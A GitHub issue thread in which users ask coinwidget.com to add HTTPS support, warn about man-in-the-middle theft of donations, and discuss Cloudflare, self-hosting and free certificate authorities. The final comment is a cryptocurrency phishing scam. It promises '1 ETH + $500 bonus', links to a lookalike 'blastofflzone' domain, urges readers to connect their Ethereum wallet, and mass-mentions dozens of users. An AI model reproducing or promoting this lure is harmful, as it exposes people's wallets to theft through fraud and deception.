### ISSUE TITLE
No HTTPS support?

### ISSUE THREAD

**Issue by kz26** [scottycc/coinwidget.com#10]
As is, the widget cannot be used on HTTPS secured pages. coinwidget.com does not seem to support SSL at all.

**Comment by jamesward** [comment]
+1 Please add HTTPS support on coinwidget.com

**Comment by joeblau** [comment]
:+1:  Yeah this is a pretty big deal.  Without HTTPS, this thing is dead in the water.  Anyone could easily MITM this site and steal your BTC donations.

**Comment by peterwilli** [comment]
Yeah I like SSL as well! Recently my open source project Gameeso got enforced SSL support and to my great sadness the widget stopped working :(

**Comment by joeblau** [comment]
The Cloud Flare CDN offers free SSL: http://blog.cloudflare.com/introducing-universal-ssl/

**Comment by peterwilli** [comment]
Yeah @joeblau I'm using it right now, it's awesome! CoinWidget: You only have to use cloudflare and enable SSL support

**Comment by rugk** [comment]
At first you of course always have the possibility to host the JS code by yourself, so you the missing HTTPS support on this site should not be an issue to you. Besides this hosting the code yourself also has some other advantages, so it's not a bad idea.

However it would still be very nice if `coinwidget.com` could have HTTPS support.
Just...

> The Cloud Flare CDN offers free SSL: http://blog.cloudflare.com/introducing-universal-ssl/

Don't use Cloudflare! Their (free) HTTPS system is basically HTTPS with MITM built-in. ([More info here](https://scotthelme.co.uk/cloudflares-great-new-features-and-why-i-wont-use-them/))

There are other CAs which offer certificates for free, so you don't need to buy one. E.g. StartSSL or WoSign. Starting [in November](https://letsencrypt.org//2015/08/07/updated-lets-encrypt-launch-schedule.html) you can also use Let's Encrypt which not only offers free certificates, but makes it also very easy to set HTTPS up.

**Comment by taylorcammack** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Moo00oody, @ZHIXINGZ, @scsfwgy, @coderfi, @michelbalthazar, @rawoofcryptos, @dawsbot, @cuongtransc, @Jack-Jhon, @ziscky, @Wraecca, @rumengkai, @prite36, @bobbytonight, @Beriwan, @csjcode, @dmitry-r, @Ectsang, @psety, @edk55, @taseenb, @betoharres, @indrajithbandara, @LK007CX, @LeonLusic, @joeling519, @QinTzu, @andyok, @Boms, @ssifood, @jz247, @inocsin, @woutrbe, @inwalking, @Oscarb95, @w1nn1ethepooh, @pbonarigo, @nmaslov255, @jinyulink, @iuvbio, @Peregrine77, @abbyswag, @smallke, @mirzap, @selcukakbas, @yunsong0922, @linglung, @dongyi, @bturkay, @scoobiedoo
